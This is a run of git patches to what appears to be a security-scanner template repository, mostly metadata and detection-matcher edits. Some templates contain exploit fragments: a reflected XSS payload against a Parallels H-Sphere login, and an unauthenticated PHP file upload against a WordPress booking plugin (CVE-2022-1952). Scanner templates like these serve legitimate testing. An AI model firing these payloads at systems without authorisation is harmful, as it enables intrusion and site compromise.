reference: - https://github.com/cesanta/mongoose metadata: - shodan-query: 'Mongoose' - tags: mongoose + shodan-query: 'Server: Mongoose' + tags: tech,mongoose requests: - method: GET @@ -22,7 +22,7 @@ requests: - type: word part: header words: - - "Server: Mongoose/" + - "Server: Mongoose" - type: status status: From 6c15aaca8955db1ae52cd57ac8cd2cf24d9936d5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 19:46:25 +0000 Subject: [PATCH 0194/1415] Auto Generated New Template Addition List [Fri Nov 11 19:46:25 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3c5b423d40..53a1f5c9e7 100644 --- a/.new-additions +++ b/.new-additions @@ -44,3 +44,4 @@ misconfiguration/system-properties-exposure.yaml network/detection/ibm-d2b-database-server-detect.yaml network/detection/mikrotik-routeros-api-detect.yaml technologies/aem-cms.yaml +technologies/mongoose-server.yaml From 39ec83e567d7ede78144c3702adc2bddf7b27f0c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 19:47:36 +0000 Subject: [PATCH 0195/1415] Auto Generated CVE annotations [Fri Nov 11 19:47:36 UTC 2022] :robot: --- cves/2019/CVE-2019-2729.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml index a74411e08d..9d1eca4f52 100644 --- a/cves/2019/CVE-2019-2729.yaml +++ b/cves/2019/CVE-2019-2729.yaml @@ -12,7 +12,7 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-2729 cwe-id: CWE-284 From e1f051f5b9135d31a64959fbc1bd8bd226bc1145 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 12 Nov 2022 01:23:55 +0530 Subject: [PATCH 0196/1415] Update ansible-awx-detect.yaml --- technologies/ansible-awx-detect.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/technologies/ansible-awx-detect.yaml b/technologies/ansible-awx-detect.yaml index d1ed24ff44..bfd84662f2 100644 --- a/technologies/ansible-awx-detect.yaml +++ b/technologies/ansible-awx-detect.yaml @@ -4,9 +4,12 @@ info: name: Ansible AWX Detection author: Adam Crosser severity: info + description: Detects Ansible AWX Instance reference: - https://github.com/ansible/awx - description: Detects Ansible AWX Instance + metadata: + verified: true + shodan-query: html:'Select a frequency for snapshot retention' tags: tech,ansible,awx requests: From 847ba52d7031cf4b9bc9a9b093934a63da9f24d7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 19:56:39 +0000 Subject: [PATCH 0197/1415] Auto Generated New Template Addition List [Fri Nov 11 19:56:39 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 53a1f5c9e7..cc8314a678 100644 --- a/.new-additions +++ b/.new-additions @@ -44,4 +44,5 @@ misconfiguration/system-properties-exposure.yaml network/detection/ibm-d2b-database-server-detect.yaml network/detection/mikrotik-routeros-api-detect.yaml technologies/aem-cms.yaml +technologies/ansible-awx-detect.yaml technologies/mongoose-server.yaml From 86b49a57caf371b4b1affe711656d8feef401402 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 20:12:04 +0000 Subject: [PATCH 0198/1415] Auto Generated CVE annotations [Fri Nov 11 20:12:04 UTC 2022] :robot: --- cves/2019/CVE-2019-2729.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml index 9d1eca4f52..a74411e08d 100644 --- a/cves/2019/CVE-2019-2729.yaml +++ b/cves/2019/CVE-2019-2729.yaml @@ -12,7 +12,7 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-2729 cwe-id: CWE-284 From c3e8f65b1452823121cb1534b719274badc8bc6f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 12 Nov 2022 01:43:12 +0530 Subject: [PATCH 0199/1415] Update CVE-2022-1952.yaml --- cves/2022/CVE-2022-1952.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-1952.yaml b/cves/2022/CVE-2022-1952.yaml index 1bcd53e74a..6e3d8c8417 100644 --- a/cves/2022/CVE-2022-1952.yaml +++ b/cves/2022/CVE-2022-1952.yaml @@ -37,7 +37,7 @@ requests: self-driven --------------------------98efee55508c5059 - Content-Disposition: form-data; name="driver_license_image2"; filename="evil.php" + Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php" Content-Type: application/octet-stream From 50b892df43e9a68db772e1543025291f5e86e7e3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 20:14:57 +0000 Subject: [PATCH 0200/1415] Auto Generated New Template Addition List [Fri Nov 11 20:14:57 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cc8314a678..4ef40e4a7a 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ cves/2022/CVE-2022-0788.yaml cves/2022/CVE-2022-0824.yaml cves/2022/CVE-2022-0867.yaml cves/2022/CVE-2022-1162.yaml +cves/2022/CVE-2022-1952.yaml cves/2022/CVE-2022-2185.yaml cves/2022/CVE-2022-2373.yaml cves/2022/CVE-2022-26263.yaml From 856be95051d73a0f389ebae67f2f07b00a3a6055 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 20:30:02 +0000 Subject: [PATCH 0201/1415] Auto Generated CVE annotations [Fri Nov 11 20:30:02 UTC 2022] :robot: --- cves/2019/CVE-2019-2729.yaml | 2 +- cves/2022/CVE-2022-1952.yaml | 7 +++++-- 2 files changed, 6 insertions(+), 3 deletions(-) diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml index a74411e08d..9d1eca4f52 100644 --- a/cves/2019/CVE-2019-2729.yaml +++ b/cves/2019/CVE-2019-2729.yaml @@ -12,7 +12,7 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-2729 cwe-id: CWE-284 diff --git a/cves/2022/CVE-2022-1952.yaml b/cves/2022/CVE-2022-1952.yaml index 6e3d8c8417..4cbe4d9820 100644 --- a/cves/2022/CVE-2022-1952.yaml +++ b/cves/2022/CVE-2022-1952.yaml @@ -11,10 +11,13 @@ info: - https://wordpress.org/plugins/easync-booking/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1952 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-1952 + cwe-id: CWE-434 metadata: - verified: true - tags: cve,cve2022,wordpress,wp-plugin,wp,file-upload,easync-booking,uauth + verified: "true" + tags: wpscan,wordpress,easync-booking,uauth,wp,file-upload,cve,cve2022,wp-plugin requests: - raw: From d02a2cbbba2aeb9c4fc748c0b5850a25a9a9bb4b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 12 Nov 2022 02:00:17 +0530 Subject: [PATCH 0202/1415] Create tekton-dashboard.yaml --- misconfiguration/tekton-dashboard.yaml | 31 ++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 misconfiguration/tekton-dashboard.yaml diff --git a/misconfiguration/tekton-dashboard.yaml b/misconfiguration/tekton-dashboard.yaml new file mode 100644 index 0000000000..83f80362df --- /dev/null +++ b/misconfiguration/tekton-dashboard.yaml @@ -0,0 +1,31 @@ +id: tekton-dashboard + +info: + name: Tekton Dashboard Exposure + author: DhiyaneshDk + severity: low + metadata: + verified: true + shodan-query: title:"Tekton" + tags: misconfig,tekton,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/#/pipelines" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Tekton Dashboard" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 2c8ace9ea6169dd7bfdd55a16c17f445d9625312 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 12 Nov 2022 08:02:13 +0530 Subject: [PATCH 0203/1415] Update CVE-2008-6465.yaml --- cves/2008/CVE-2008-6465.yaml | 31 ++++++++++++++++--------------- 1 file changed, 16 insertions(+), 15 deletions(-) diff --git a/cves/2008/CVE-2008-6465.yaml b/cves/2008/CVE-2008-6465.yaml index 30c0cfd510..3b3a3bdf76 100644 --- a/cves/2008/CVE-2008-6465.yaml +++ b/cves/2008/CVE-2008-6465.yaml @@ -10,28 +10,29 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2008-6465 classification: cve-id: CVE-2008-6465 - tags: xss,parallels,hsphere,cve2008 + metadata: + verified: true + shodan-query: title:"Parallels H-Sphere" + tags: cve,cve2008,xss,parallels requests: - - raw: - - | - @timeout: 10s - GET /webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U' matchers-condition: and matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '\" onfocus=alert(document.domain); autofocus' + - 'Please enter login name & password' - type: word part: header words: - - "text/html" + - 'text/html' - - type: word - part: body - words: - - "\" onfocus=alert(document.domain); autofocus" - - "-at--psoft.net>" \ No newline at end of file + - type: status + status: + - 200 From 0a022711502b5320e94d2d6b29b031cd661afcbe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 12 Nov 2022 02:33:55 +0000 Subject: [PATCH 0204/1415] Auto Generated New Template Addition List [Sat Nov 12 02:33:55 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4ef40e4a7a..b05cd1967c 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2008/CVE-2008-6465.yaml cves/2022/CVE-2022-0735.yaml cves/2022/CVE-2022-0785.yaml cves/2022/CVE-2022-0788.yaml From c9ebc5388c32d7cc0256b0f4d8812799862bb66d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 12 Nov 2022 08:07:51 +0530 Subject: [PATCH 0205/1415] Update CVE-2008-6465.yaml --- cves/2008/CVE-2008-6465.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2008/CVE-2008-6465.yaml b/cves/2008/CVE-2008-6465.yaml index 3b3a3bdf76..ffed19ddca 100644 --- a/cves/2008/CVE-2008-6465.yaml +++ b/cves/2008/CVE-2008-6465.yaml @@ -27,6 +27,7 @@ requests: words: - '\" onfocus=alert(document.domain); autofocus' - 'Please enter login name & password' + condition: and - type: word part: header From 02b3393a9a6d1ef5b8070579855219ed1c6a9824 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 12 Nov 2022 02:55:56 +0000 Subject: [PATCH 0207/1415] Auto Generated CVE annotations [Sat Nov 12 02:55:56 UTC 2022] :robot: --- cves/2008/CVE-2008-6465.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2008/CVE-2008-6465.yaml b/cves/2008/CVE-2008-6465.yaml index ffed19ddca..a10d1c39e5 100644 --- a/cves/2008/CVE-2008-6465.yaml +++ b/cves/2008/CVE-2008-6465.yaml @@ -8,11 +8,14 @@ info: Multiple cross-site scripting (XSS) vulnerabilities in login.php in webshell4 in Parallels H-Sphere 3.0.0 P9 and 3.1 P1 allow remote attackers to inject arbitrary web script or HTML via the (1) err, (2) errorcode, and (3) login parameters. reference: - https://nvd.nist.gov/vuln/detail/CVE-2008-6465 + - http://www.xssing.com/index.php?x=3&y=65 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/45254 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/45252 classification: cve-id: CVE-2008-6465 metadata: - verified: true shodan-query: title:"Parallels H-Sphere" + verified: "true" tags: cve,cve2008,xss,parallels requests: From 3e56815718133870dc5f240069abd197e7a4fcc5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 12 Nov 2022 12:32:46 +0530 Subject: [PATCH 0208/1415] Update zebra-printer-detect.yaml --- iot/zebra-printer-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/iot/zebra-printer-detect.yaml b/iot/zebra-printer-detect.yaml index 76cef05357..34d703c61d 100644 --- a/iot/zebra-printer-detect.yaml +++ b/iot/zebra-printer-detect.yaml @@ -1,7 +1,7 @@ id: zebra-printer-detect info: - name: Zebra Printer Detection + name: Zebra Printer Detect author: gy741 severity: info reference: @@ -9,7 +9,7 @@ info: metadata: verified: true shodan-query: html:"Zebra Technologies" - tags: iot,zebra + tags: iot,zebra,printer requests: - method: GET From ef3e032a9dddcf40eba32c459dd70c6eba77fb5e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 12 Nov 2022 12:41:05 +0530 Subject: [PATCH 0209/1415] Update jumpserver-panel.yaml --- exposed-panels/jumpserver-panel.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/exposed-panels/jumpserver-panel.yaml b/exposed-panels/jumpserver-panel.yaml index 2140bd47db..686c820517 100644 --- a/exposed-panels/jumpserver-panel.yaml +++ b/exposed-panels/jumpserver-panel.yaml @@ -1,7 +1,7 @@ id: jumpserver-panel info: - name: JumpServer admin panel + name: JumpServer Admin Panel author: lu4nx severity: info description: | @@ -9,6 +9,8 @@ info: reference: - https://www.jumpserver.org/ metadata: + verified: true + shodan-query: http.title:'JumpServer' zoomeye-query: title:'JumpServer' tags: panel,jumpserver @@ -21,10 +23,10 @@ requests: matchers: - type: regex part: body - condition: or regex: - "(?i)(\n.*)JumpServer Open Source Bastion Host(\n.*)" - "(?i)(\n.*)JumpServer 开源堡垒机(\n.*)" + condition: or - type: status status: From 59ae376bff4ae097f337a86803f17ab00fcaab3d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 12 Nov 2022 07:15:02 +0000 Subject: [PATCH 0210/1415] Auto Generated New Template Addition List [Sat Nov 12 07:15:02 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b05cd1967c..baaa550098 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ default-logins/samsung/samsung-printer-default-login.yaml exposed-panels/airnotifier-panel.yaml exposed-panels/deluge-webui-panel.yaml exposed-panels/dplus-dashboard.yaml +exposed-panels/jumpserver-panel.yaml exposed-panels/kfm/kaes-file-manager.yaml exposed-panels/kfm/kfm-login-panel.yaml exposed-panels/mailhog-panel.yaml From ff159802b6ddada9c27acf8961221907a3f40b72 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 12 Nov 2022 12:46:43 +0530 Subject: [PATCH 0211/1415] Update mongoose-server.yaml --- technologies/mongoose-server.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/technologies/mongoose-server.yaml b/technologies/mongoose-server.yaml index 5bd5de3095..495861cf86 100644 --- a/technologies/mongoose-server.yaml +++ b/technologies/mongoose-server.yaml @@ -9,6 +9,7 @@ info: reference: - https://github.com/cesanta/mongoose metadata: + verified: true shodan-query: 'Server: Mongoose' tags: tech,mongoose From 7293397bf411c718ce9109a3878830d62fc4f62b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 12 Nov 2022 12:47:42 +0530 Subject: [PATCH 0212/1415] Update ansible-awx-detect.yaml --- technologies/ansible-awx-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/technologies/ansible-awx-detect.yaml b/technologies/ansible-awx-detect.yaml index bfd84662f2..c777d338dd 100644 --- a/technologies/ansible-awx-detect.yaml +++ b/technologies/ansible-awx-detect.yaml @@ -23,6 +23,7 @@ requests: part: body words: - '"description":"AWX REST API"' + - type: status status: - 200 From c32578e1522de6c07c2c2391ba466da0cc9eefbe Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 12 Nov 2022 12:48:56 +0530 Subject: [PATCH 0213/1415] Update CVE-2022-1952.yaml --- cves/2022/CVE-2022-1952.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-1952.yaml b/cves/2022/CVE-2022-1952.yaml index 4cbe4d9820..2124b7189e 100644 --- a/cves/2022/CVE-2022-1952.yaml +++ b/cves/2022/CVE-2022-1952.yaml @@ -16,8 +16,8 @@ info: cve-id: CVE-2022-1952 cwe-id: CWE-434 metadata: - verified: "true" - tags: wpscan,wordpress,easync-booking,uauth,wp,file-upload,cve,cve2022,wp-plugin + verified: true + tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive requests: - raw: From e4d2c8aa6019d8b0d0b2eded5b5ce6bada7c5b4d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 12 Nov 2022 12:50:30 +0530 Subject: [PATCH 0214/1415] Update CVE-2008-6465.yaml --- cves/2008/CVE-2008-6465.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2008/CVE-2008-6465.yaml b/cves/2008/CVE-2008-6465.yaml index a10d1c39e5..3b0def4ffc 100644 --- a/cves/2008/CVE-2008-6465.yaml +++ b/cves/2008/CVE-2008-6465.yaml @@ -7,16 +7,16 @@ info: description: | Multiple cross-site scripting (XSS) vulnerabilities in login.php in webshell4 in Parallels H-Sphere 3.0.0 P9 and 3.1 P1 allow remote attackers to inject arbitrary web script or HTML via the (1) err, (2) errorcode, and (3) login parameters. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2008-6465 - http://www.xssing.com/index.php?x=3&y=65 - https://exchange.xforce.ibmcloud.com/vulnerabilities/45254 - https://exchange.xforce.ibmcloud.com/vulnerabilities/45252 + - https://nvd.nist.gov/vuln/detail/CVE-2008-6465 classification: cve-id: CVE-2008-6465 metadata: - shodan-query: title:"Parallels H-Sphere" - verified: "true" - tags: cve,cve2008,xss,parallels + verified: true + shodan-query: title:"Parallels H-Sphere + tags: cve,cve2008,xss,parallels,h-sphere requests: - method: GET From cf9720072aaf99e6faee63b8215213ab474de9df Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 12 Nov 2022 12:52:58 +0530 Subject: [PATCH 0215/1415] Update and rename mikrotik-routeros-api-detect.yaml to mikrotik-routeros-api.yaml --- ...ik-routeros-api-detect.yaml => mikrotik-routeros-api.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename network/detection/{mikrotik-routeros-api-detect.yaml => mikrotik-routeros-api.yaml} (93%) diff --git a/network/detection/mikrotik-routeros-api-detect.yaml b/network/detection/mikrotik-routeros-api.yaml similarity index 93% rename from network/detection/mikrotik-routeros-api-detect.yaml rename to network/detection/mikrotik-routeros-api.yaml index 12474e6dcf..07216563a5 100644 --- a/network/detection/mikrotik-routeros-api-detect.yaml +++ b/network/detection/mikrotik-routeros-api.yaml @@ -1,4 +1,4 @@ -id: mikrotik-routeros-api-detect +id: mikrotik-routeros-api info: name: MikroTik RouterOS API Detection @@ -9,7 +9,7 @@ info: metadata: verified: true shodan-query: product:"MikroTik RouterOS API Service" - tags: network,detect,mikrotik + tags: network,mikrotik network: - inputs: From 7d9f464a3a0673b7b5c6ae1d0d52f40a464a0f29 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 12 Nov 2022 12:54:14 +0530 Subject: [PATCH 0216/1415] Update samsung-printer-default-login.yaml --- default-logins/samsung/samsung-printer-default-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/default-logins/samsung/samsung-printer-default-login.yaml b/default-logins/samsung/samsung-printer-default-login.yaml index 57eccb74b8..25e1f5f85c 100644 --- a/default-logins/samsung/samsung-printer-default-login.yaml +++ b/default-logins/samsung/samsung-printer-default-login.yaml @@ -31,6 +31,7 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "success: true" - "passwordExpiration" From ae5d963c2d8d8510ef326bf3de81121a356564b1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 12 Nov 2022 12:55:35 +0530 Subject: [PATCH 0217/1415] Update wiren-board-webui.yaml --- exposed-panels/wiren-board-webui.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/wiren-board-webui.yaml b/exposed-panels/wiren-board-webui.yaml index 4bdcc7fbe3..edea176059 100644 --- a/exposed-panels/wiren-board-webui.yaml +++ b/exposed-panels/wiren-board-webui.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-dork: http.title:"Wiren Board Web UI" - tags: panel,exposure + tags: panel,exposure,wiren requests: - method: GET From 62479e666322a698d4ef242c8d4003e641f5d0f5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 12 Nov 2022 12:59:08 +0530 Subject: [PATCH 0218/1415] Update and rename ibm-d2b-database-server-detect.yaml to ibm-d2b-database-server.yaml --- ...abase-server-detect.yaml => ibm-d2b-database-server.yaml} | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) rename network/detection/{ibm-d2b-database-server-detect.yaml => ibm-d2b-database-server.yaml} (93%) diff --git a/network/detection/ibm-d2b-database-server-detect.yaml b/network/detection/ibm-d2b-database-server.yaml similarity index 93% rename from network/detection/ibm-d2b-database-server-detect.yaml rename to network/detection/ibm-d2b-database-server.yaml index ff3e9f4043..0f3df11b2e 100644 --- a/network/detection/ibm-d2b-database-server-detect.yaml +++ b/network/detection/ibm-d2b-database-server.yaml @@ -1,4 +1,4 @@ -id: ibm-d2b-database-server-detect +id: ibm-d2b-database-server info: name: IBM DB2 Database Server Detection @@ -11,7 +11,7 @@ info: metadata: verified: true shodan-query: product:"IBM DB2 Database Server" - tags: network,detect,ibm,database + tags: network,ibm,database,db,db2 network: - inputs: @@ -29,3 +29,4 @@ network: - "SQLDB2RA" - "DB2" - "SQLJS1D" + condition: or From de0a23899c975d1153afa3698d9238d05cf92286 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 12 Nov 2022 07:29:57 +0000 Subject: [PATCH 0219/1415] Auto Generated CVE annotations [Sat Nov 12 07:29:57 UTC 2022] :robot: --- cves/2019/CVE-2019-2729.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml index 9d1eca4f52..a74411e08d 100644 --- a/cves/2019/CVE-2019-2729.yaml +++ b/cves/2019/CVE-2019-2729.yaml @@ -12,7 +12,7 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-2729 cwe-id: CWE-284 From 6a5c88f07600f883d8c5d183c47dcd640da8f120 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 12 Nov 2022 13:00:09 +0530 Subject: [PATCH 0220/1415] Update ntop-panel-exposed.yaml --- misconfiguration/ntop-panel-exposed.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/ntop-panel-exposed.yaml b/misconfiguration/ntop-panel-exposed.yaml index 7bd47ece1c..93219d67f6 100644 --- a/misconfiguration/ntop-panel-exposed.yaml +++ b/misconfiguration/ntop-panel-exposed.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: title:"Configure ntop" - tags: misconfig,ntop,network + tags: misconfig,ntop,exposure requests: - method: GET From 81c9609d30b9ea93495e9770a3a51bdeb9cd245a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 12 Nov 2022 13:03:28 +0530 Subject: [PATCH 0221/1415] Update confluence-dashboard.yaml --- misconfiguration/confluence-dashboard.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/confluence-dashboard.yaml b/misconfiguration/confluence-dashboard.yaml index 003cadf9e2..4bde9b1b40 100644 --- a/misconfiguration/confluence-dashboard.yaml +++ b/misconfiguration/confluence-dashboard.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: title:"Dashboard - Confluence" - tags: misconfig,exposure,confluence + tags: misconfig,exposure,confluence,atlassian requests: - method: GET From acf13dd7a7b3d738a69b912f58ad520ab0d0499b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 12 Nov 2022 13:05:53 +0530 Subject: [PATCH 0222/1415] Update datahub-metadata-default-login.yaml --- default-logins/datahub/datahub-metadata-default-login.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/default-logins/datahub/datahub-metadata-default-login.yaml b/default-logins/datahub/datahub-metadata-default-login.yaml index ab7ac89e03..cf3a4243b3 100644 --- a/default-logins/datahub/datahub-metadata-default-login.yaml +++ b/default-logins/datahub/datahub-metadata-default-login.yaml @@ -33,7 +33,6 @@ requests: part: header words: - 'Set-Cookie: actor=urn:li:corpuser:datahub;' - condition: and - type: status status: From bc1563ea4f89c123db06f75fa04a44baf50a6a08 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 12 Nov 2022 13:10:20 +0530 Subject: [PATCH 0223/1415] Update and rename misconfiguration/hydra-dashboard.yaml to exposed-panels/hydra-dashboard.yaml --- {misconfiguration => exposed-panels}/hydra-dashboard.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename {misconfiguration => exposed-panels}/hydra-dashboard.yaml (93%) diff --git a/misconfiguration/hydra-dashboard.yaml b/exposed-panels/hydra-dashboard.yaml similarity index 93% rename from misconfiguration/hydra-dashboard.yaml rename to exposed-panels/hydra-dashboard.yaml index e8a14ce061..0d43eb8eaa 100644 --- a/misconfiguration/hydra-dashboard.yaml +++ b/exposed-panels/hydra-dashboard.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: title:"Hydra Router Dashboard" - tags: misconfig,exposure,hydra + tags: panel,exposure,hydra requests: - method: GET From 0bfddf9e4feee49a250d7eec2fab0a870df663aa Mon Sep 17 00:00:00 2001 From: pbuff07 <2323217463@qq.com> Date: Sat, 12 Nov 2022 19:46:32 +0800 Subject: [PATCH 0224/1415] Update matching features --- exposed-panels/xiaomi-wireless-router-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/xiaomi-wireless-router-login.yaml b/exposed-panels/xiaomi-wireless-router-login.yaml index de280566cf..a758a0a3d3 100644 --- a/exposed-panels/xiaomi-wireless-router-login.yaml +++ b/exposed-panels/xiaomi-wireless-router-login.yaml @@ -24,6 +24,7 @@ requests: part: body words: - "小米路由器" + - "Redmi路由器" - type: status status: From 354d132ce388fbc15bf35becc4f6d569db7010dd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 13 Nov 2022 13:38:11 +0530 Subject: [PATCH 0225/1415] Update xiaomi-wireless-router-login.yaml --- exposed-panels/xiaomi-wireless-router-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/xiaomi-wireless-router-login.yaml b/exposed-panels/xiaomi-wireless-router-login.yaml index a758a0a3d3..775e9464ab 100644 --- a/exposed-panels/xiaomi-wireless-router-login.yaml +++ b/exposed-panels/xiaomi-wireless-router-login.yaml @@ -25,6 +25,7 @@ requests: words: - "小米路由器" - "Redmi路由器" + condition: or - type: status status: From 63dcdac3cb651cc990e591558991c4f658a18daa Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 13 Nov 2022 13:41:00 +0530 Subject: [PATCH 0226/1415] Update and rename aem-detection.yaml to aem-detect.yaml --- technologies/{aem-detection.yaml => aem-detect.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{aem-detection.yaml => aem-detect.yaml} (97%) diff --git a/technologies/aem-detection.yaml b/technologies/aem-detect.yaml similarity index 97% rename from technologies/aem-detection.yaml rename to technologies/aem-detect.yaml index b55e8602fe..3c2082f60d 100644 --- a/technologies/aem-detection.yaml +++ b/technologies/aem-detect.yaml @@ -1,4 +1,4 @@ -id: aem-detection +id: aem-detect info: name: Favicon based AEM Detection From 6b806fc905a816eb137dce14c08cd7a5d4049051 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 13 Nov 2022 